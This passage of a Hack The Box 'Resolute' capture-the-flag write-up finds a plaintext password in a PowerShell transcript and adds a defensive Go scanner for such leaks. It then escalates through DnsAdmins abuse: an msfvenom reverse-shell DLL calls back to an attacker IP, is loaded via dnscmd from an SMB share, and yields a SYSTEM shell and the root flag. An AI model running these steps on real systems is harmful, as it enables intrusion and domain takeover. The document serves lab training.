PS megabank\ryan@RESOLUTE Documents>
Command start time: 20191203063515
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\... ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
CommandInvocation(Out-String): "Out-String"
ParameterBinding(Out-String): name="Stream"; value="True"
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\... .exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
Command start time: 20191203063515
PS>CommandInvocation(Out-String): "Out-String"
ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\... ryan Serv3r4Admin4cc123!
    + CategoryInfo          : NotSpecified: (The syntax of this command is: :string) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\... ryan Serv3r4Admin4cc123!
    + CategoryInfo          : NotSpecified: (The syntax of this command is: :string) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
Windows PowerShell transcript start
Start time: 20191203063515

Did you see it? ryan’s password is in the other transcript file! Password: Serv3r4Admin4cc123!
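Transcripts like the one above are exactly why PSTranscripts directories deserve a regular audit on your own hosts. As an added example (not code from the writeup), this Go scanner parses the transcript header fields and flags recorded commands that carry an inline password, and runs on a constructed sample modelled on the transcript above; the UNC path is a placeholder because it was not legible in the screenshot.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one recorded command that appears to carry a plaintext credential,
// plus the transcript header fields that say who ran it, where and when.
type Finding struct {
	Username, Machine, StartTime, Rule, Command string
}

var (
	// Header lines that follow every "Windows PowerShell transcript start".
	headerRe = regexp.MustCompile(`^(Start time|Username|RunAs User|Machine):\s*(.*)$`)
	// The command text as a PSRemoting transcript records it (first line of the value).
	commandRe = regexp.MustCompile(`ParameterBinding\(Invoke-Expression\): name="Command"; value="(.*)`)
	// net use takes the password positionally after the share name.
	netUseRe = regexp.MustCompile(`(?i)\bnet\s+use\s+(?:[A-Za-z]:\s+)?\\\\\S+((?:\s+\S+)*)`)
	// Other common ways a password ends up on a command line.
	plainRe = regexp.MustCompile(`(?i)ConvertTo-SecureString\b.*-AsPlainText|(?:^|\s)(?:-p(?:assword)?\s+|/p(?:ass(?:word)?)?:|password=)\S`)
)

// netUseHasInlinePassword reports whether anything other than a /switch follows the share.
func netUseHasInlinePassword(command string) bool {
	m := netUseRe.FindStringSubmatch(command)
	if m == nil {
		return false
	}
	for _, tok := range strings.Fields(m[1]) {
		if !strings.HasPrefix(tok, "/") {
			return true
		}
	}
	return false
}

// ScanTranscript walks one transcript and returns every recorded command that matches a rule.
func ScanTranscript(text string) []Finding {
	header := map[string]string{}
	var findings []Finding
	for _, line := range strings.Split(text, "\n") {
		line = strings.TrimRight(line, "\r")
		if h := headerRe.FindStringSubmatch(line); h != nil {
			header[h[1]] = strings.TrimSpace(h[2])
			continue
		}
		m := commandRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		command := strings.TrimSuffix(m[1], `"`)
		rule := ""
		if netUseHasInlinePassword(command) {
			rule = "net use with inline password"
		} else if plainRe.MatchString(command) {
			rule = "plaintext password argument"
		} else {
			continue
		}
		findings = append(findings, Finding{header["Username"], header["Machine"], header["Start time"], rule, command})
	}
	return findings
}

// Constructed sample modelled on the transcript above; the UNC path was not legible
// in the screenshot, so a placeholder share stands in for it.
const SampleTranscript = `Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\PLACEHOLDER\share ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
`
// Constructed benign line: the same mapping with no password on the command line.
const SampleBenign = `>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\PLACEHOLDER\share /persistent:no"`
func main() { fmt.Println(ScanTranscript(SampleTranscript)) }
```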

Let’s try these creds with ryan:

Alright, time to look around. We enumerated, looking at basic things like whoami /groups:

PS C:\...> whoami /groups

GROUP INFORMATION

Group Name                                  Type             SID                                            Attributes
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                        Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                          Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level      Label            S-1-16-8192

After a while, I came up with nothing. I used PowerUp.ps1 to find an interesting potential exploit:

HijackablePath : C:\...
AbuseFunction  : Write-HijackDll -OutputFile 'C:\...\wlbsctrl.dll' -Command ...

This link actually helped me out a lot in understanding what to do next.

So, I created a malicious DLL:

kali@hyd3:~/Documents/htb/resolute$ msfvenom -p ... LHOST=10.10.14.22 LPORT=443 -a ... -f dll -o wlbsctrl.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
Saved as: wlbsctrl.dll

Then I served it up on SMB:

kali@hyd3:~/Documents/htb/resolute$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py ROPNOP /home/kali/Documents/htb/resolute/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

And I injected the DLL remotely (a really cool trick I didn’t know before):

PS C:\...> dnscmd.exe RESOLUTE /config /serverlevelplugindll \\10.10.14.22\ROPNOP\wlbsctrl.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

PS C:\...> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3   STOP_PENDING
                                 (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0   (0x0)
        SERVICE_EXIT_CODE  : 0   (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\...> sc.exe start dns

I then started the DNS process as seen above. With the listener on port 443, I caught an NT AUTHORITY\SYSTEM shell:

listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 52809
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\...>whoami
whoami
nt authority\system

C:\Windows\...>type C:\...\root.txt
type C:\...\root.txt
The system cannot find the file specified.

C:\Windows\...>cd C:\...
C:\...>type Desktop\root.txt
type Desktop\root.txt
e1d94876a506850d0c20edb5W5e619c